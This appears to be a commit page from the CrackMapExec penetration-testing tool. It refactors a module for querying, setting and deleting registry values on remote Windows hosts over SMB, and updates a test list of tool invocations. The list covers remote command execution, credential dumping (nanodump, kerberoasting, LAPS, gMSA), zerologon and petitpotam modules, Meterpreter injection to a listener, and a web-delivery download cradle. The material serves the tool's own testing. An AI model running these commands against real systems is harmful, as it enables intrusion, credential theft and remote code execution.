tests: update tests
Marshall Hallenbeck
parent
ac563f1b91
commit
7da0b71fa8
|
|
@ -7,21 +7,29 @@ from impacket.examples.secretsdump import RemoteOperations
|
|||
|
||||
|
||||
class CMEModule:
|
||||
name = 'reg-query'
|
||||
description = 'Performs a registry query on the machine'
|
||||
supported_protocols = ['smb']
|
||||
opsec_safe = True
|
||||
multiple_hosts = True
|
||||
def __init__(self, context=None):
|
||||
self.delete = None
|
||||
self.type = None
|
||||
self.value = None
|
||||
self.key = None
|
||||
self.path = None
|
||||
self.name = 'reg-query'
|
||||
self.description = 'Performs a registry query on the machine'
|
||||
self.supported_protocols = ['smb']
|
||||
self.opsec_safe = True
|
||||
self.multiple_hosts = True
|
||||
self.context = context
|
||||
|
||||
def options(self, context, module_options):
|
||||
'''
|
||||
PATH: Registry key path to query
|
||||
KEY: Registry key value to retrieve
|
||||
VALUE Registry key value to set (only used for modification). Will add a new regitry key if use on registry key that does not already exist
|
||||
TYPE Type of registry to modify, add or delete. Default type : REG_SZ. Type supported : REG_NONE, REG_SZ, REG_EXPAND_SZ,REG_BINARY, REG_DWORD, REG_DWORD_BIG_ENDIAN, REG_LINK, REG_MULTI_SZ, REG_QWORD
|
||||
DELETE If set to True, delete a registry key if it does exist
|
||||
'''
|
||||
|
||||
"""
|
||||
PATH Registry key path to query
|
||||
KEY Registry key value to retrieve
|
||||
VALUE Registry key value to set (only used for modification)
|
||||
Will add a new registry key if the registry key does not already exist
|
||||
TYPE Type of registry to modify, add or delete. Default type : REG_SZ.
|
||||
Type supported: REG_NONE, REG_SZ, REG_EXPAND_SZ,REG_BINARY, REG_DWORD, REG_DWORD_BIG_ENDIAN, REG_LINK, REG_MULTI_SZ, REG_QWORD
|
||||
DELETE If set to True, delete a registry key if it does exist
|
||||
"""
|
||||
self.context = context
|
||||
self.path = None
|
||||
self.key = None
|
||||
|
|
@ -54,12 +62,12 @@ class CMEModule:
|
|||
try :
|
||||
self.value = int(self.value)
|
||||
except:
|
||||
context.log.error("Invalid registry value type specified: %s" % self.value)
|
||||
sys.exit(1)
|
||||
context.log.error(f"Invalid registry value type specified: {self.value}")
|
||||
return
|
||||
if self.type in type_dict:
|
||||
self.type = type_dict[self.type]
|
||||
else:
|
||||
context.log.error("Invalid registry value type specified: %s" % self.type)
|
||||
context.log.error(f"Invalid registry value type specified: {self.type}")
|
||||
return
|
||||
else:
|
||||
self.type = 1
|
||||
|
|
@ -68,83 +76,114 @@ class CMEModule:
|
|||
self.delete = True
|
||||
|
||||
def on_admin_login(self, context, connection):
|
||||
self.context = context
|
||||
if not self.path:
|
||||
context.log.error("Please provide the path of the registry to query")
|
||||
self.context.log.error("Please provide the path of the registry to query")
|
||||
return
|
||||
|
||||
if not self.key:
|
||||
context.log.error("Please provide the registry key to query")
|
||||
self.context.log.error("Please provide the registry key to query")
|
||||
return
|
||||
|
||||
remoteOps = RemoteOperations(connection.conn, False)
|
||||
remoteOps.enableRegistry()
|
||||
remote_ops = RemoteOperations(connection.conn, False)
|
||||
remote_ops.enableRegistry()
|
||||
|
||||
try:
|
||||
if "HKLM" in self.path or "HKEY_LOCAL_MACHINE" in self.path:
|
||||
self.path = (self.path).replace('HKLM\\', '')
|
||||
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
|
||||
|
||||
self.path = self.path.replace('HKLM\\', '')
|
||||
ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)
|
||||
elif "HKCU" in self.path or "HKEY_CURRENT_USER" in self.path:
|
||||
self.path = (self.path).replace('HKCU\\', '')
|
||||
ans = rrp.hOpenCurrentUser(remoteOps._RemoteOperations__rrp)
|
||||
|
||||
self.path = self.path.replace('HKCU\\', '')
|
||||
ans = rrp.hOpenCurrentUser(remote_ops._RemoteOperations__rrp)
|
||||
elif "HKCR" in self.path or "HKEY_CLASSES_ROOT" in self.path:
|
||||
self.path = (self.path).replace('HKCR\\', '')
|
||||
ans = rrp.hOpenClassesRoot(remoteOps._RemoteOperations__rrp)
|
||||
|
||||
self.path = self.path.replace('HKCR\\', '')
|
||||
ans = rrp.hOpenClassesRoot(remote_ops._RemoteOperations__rrp)
|
||||
else:
|
||||
context.log.error("Unsupported registry hive specified in path: %s" % self.path)
|
||||
self.context.log.error(f"Unsupported registry hive specified in path: {self.path}")
|
||||
return
|
||||
|
||||
regHandle = ans['phKey']
|
||||
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, self.path)
|
||||
keyHandle = ans['phkResult']
|
||||
reg_handle = ans['phKey']
|
||||
ans = rrp.hBaseRegOpenKey(
|
||||
remote_ops._RemoteOperations__rrp,
|
||||
reg_handle,
|
||||
self.path
|
||||
)
|
||||
key_handle = ans['phkResult']
|
||||
|
||||
if self.delete:
|
||||
# Delete registry
|
||||
try:
|
||||
# Check if value exists
|
||||
dataType, reg_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key)
|
||||
data_type, reg_value = rrp.hBaseRegQueryValue(
|
||||
remote_ops._RemoteOperations__rrp,
|
||||
key_handle,
|
||||
self.key
|
||||
)
|
||||
except:
|
||||
self.context.log.error("Registry key %s does not exist" % (self.key))
|
||||
self.context.log.error(f"Registry key {self.key} does not exist")
|
||||
return
|
||||
# Delete value
|
||||
rrp.hBaseRegDeleteValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key)
|
||||
self.context.log.success('Registry key %s has been deleted successfully' % (self.key))
|
||||
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
|
||||
rrp.hBaseRegDeleteValue(
|
||||
remote_ops._RemoteOperations__rrp,
|
||||
key_handle,
|
||||
self.key
|
||||
)
|
||||
self.context.log.success(f"Registry key {self.key} has been deleted successfully")
|
||||
rrp.hBaseRegCloseKey(
|
||||
remote_ops._RemoteOperations__rrp,
|
||||
key_handle
|
||||
)
|
||||
|
||||
if self.value is not None:
|
||||
# Check if value exists
|
||||
try:
|
||||
# Check if value exists
|
||||
dataType, reg_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key)
|
||||
self.context.log.highlight("Key %s exists with value %s" % (self.key, reg_value))
|
||||
data_type, reg_value = rrp.hBaseRegQueryValue(
|
||||
remote_ops._RemoteOperations__rrp,
|
||||
key_handle,
|
||||
self.key
|
||||
)
|
||||
self.context.log.highlight(f"Key {self.key} exists with value {reg_value}")
|
||||
# Modification
|
||||
rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key, self.type, self.value)
|
||||
context.log.success("Key %s has been modified to %s" % (self.key, self.value))
|
||||
rrp.hBaseRegSetValue(
|
||||
remote_ops._RemoteOperations__rrp,
|
||||
key_handle,
|
||||
self.key,
|
||||
self.type,
|
||||
self.value
|
||||
)
|
||||
self.context.log.success(f"Key {self.key} has been modified to {self.value}")
|
||||
except:
|
||||
rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key, self.type, self.value)
|
||||
self.context.log.success("New Key %s has been added with value %s" % (self.key, self.value))
|
||||
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
|
||||
|
||||
rrp.hBaseRegSetValue(
|
||||
remote_ops._RemoteOperations__rrp,
|
||||
key_handle,
|
||||
self.key,
|
||||
self.type,
|
||||
self.value
|
||||
)
|
||||
self.context.log.success(f"New Key {self.key} has been added with value {self.value}")
|
||||
rrp.hBaseRegCloseKey(
|
||||
remote_ops._RemoteOperations__rrp,
|
||||
key_handle
|
||||
)
|
||||
else:
|
||||
# Query
|
||||
try :
|
||||
dataType, reg_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key)
|
||||
context.log.highlight("%s: %s" % (self.key, reg_value))
|
||||
try:
|
||||
data_type, reg_value = rrp.hBaseRegQueryValue(
|
||||
remote_ops._RemoteOperations__rrp,
|
||||
key_handle,
|
||||
self.key
|
||||
)
|
||||
self.context.log.highlight(f"{self.key}: {reg_value}")
|
||||
except:
|
||||
if self.delete:
|
||||
pass
|
||||
else :
|
||||
self.context.log.error("Registry key %s does not exist" % (self.key))
|
||||
else:
|
||||
self.context.log.error(f"Registry key {self.key} does not exist")
|
||||
return
|
||||
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
|
||||
|
||||
rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle)
|
||||
except DCERPCException as e:
|
||||
#context.log.error("DCERPC Error while querying or modifying registry: %s" % e)
|
||||
pass
|
||||
self.context.log.error(f"DCERPC Error while querying or modifying registry: {e}")
|
||||
except Exception as e:
|
||||
context.log.error("Error while querying or modifying registry: %s" % e)
|
||||
|
||||
self.context.log.error(f"Error while querying or modifying registry: {e}")
|
||||
finally:
|
||||
remoteOps.finish()
|
||||
remote_ops.finish()
|
||||
|
|
|
|||
|
|
@ -1,3 +1,4 @@
|
|||
##### SMB
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --shares
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --shares --filter-shares READ WRITE
|
||||
|
|
@ -20,6 +21,7 @@ crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -x whoami
|
|||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami --obfs
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --wmi "os get"
|
||||
##### SMB Modules
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M bh_owned
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M dfscoerce
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M drop-sc
|
||||
|
|
@ -58,7 +60,7 @@ crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdcman
|
|||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp --options
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=disable
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M reg-query
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M reg-query -o PATH=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion KEY=DevicePath
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M runasppl
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M scuffy -o SERVER=127.0.0.1 NAME=test
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M shadowcoerce
|
||||
|
|
@ -122,8 +124,10 @@ crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M veeam --options
|
|||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M wifi --options
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M winscp --options
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M zerologon --options
|
||||
##### SMB Anonymous Auth
|
||||
crackmapexec smb TARGET -u '' -p '' -M zerologon
|
||||
crackmapexec smb TARGET -u '' -p '' -M petitpotam
|
||||
##### LDAP
|
||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --users
|
||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --groups
|
||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --get-sid
|
||||
|
|
@ -132,6 +136,7 @@ crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --kerberoasting /tmp/o
|
|||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --trusted-for-delegation
|
||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --admin-count
|
||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --gmsa
|
||||
##### LDAP Modules
|
||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M adcs
|
||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M adcs --options
|
||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M daclread
|
||||
|
|
@ -154,18 +159,27 @@ crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M user-desc
|
|||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M user-desc --options
|
||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M whoami
|
||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M whoami --options
|
||||
crackmapexec winrm TARGET -u USERNAME -p PASSWORD
|
||||
crackmapexec winrm TARGET -u USERNAME -p PASSWORD -X whoami
|
||||
crackmapexec winrm TARGET -u USERNAME -p PASSWORD --laps
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD
|
||||
##### WINRM
|
||||
crackmapexec winrm TARGET -u USERNAME -p PASSWORD KERBEROS
|
||||
crackmapexec winrm TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami
|
||||
crackmapexec winrm TARGET -u USERNAME -p PASSWORD KERBEROS --laps
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS
|
||||
##### MSSQL
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS
|
||||
##### MSSQL Modules
|
||||
# crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M empire_exec
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M met_inject --options
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M mssql_priv
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M mssql_priv --options
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M nanodump
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M nanodump --options
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M test_connection --options
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M test_connection -o HOST=localhost
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M web_delivery --options
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M web_delivery -o URL=localhost/dl_cradle
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M met_inject --options
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M mssql_priv
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M mssql_priv --options
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M nanodump
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M nanodump --options
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M test_connection --options
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M test_connection -o HOST=localhost
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M web_delivery --options
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M web_delivery -o URL=localhost/dl_cradle
|
||||
# a bit janky, but we try to enable RDP before testing RDP
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
|
||||
##### RDP
|
||||
crackmapexec rdp TARGET -u USERNAME -p PASSWORD KERBEROS
|
||||
crackmapexec rdp TARGET -u USERNAME -p PASSWORD KERBEROS --nla-screenshot
|
||||
Loading…
Reference in New Issue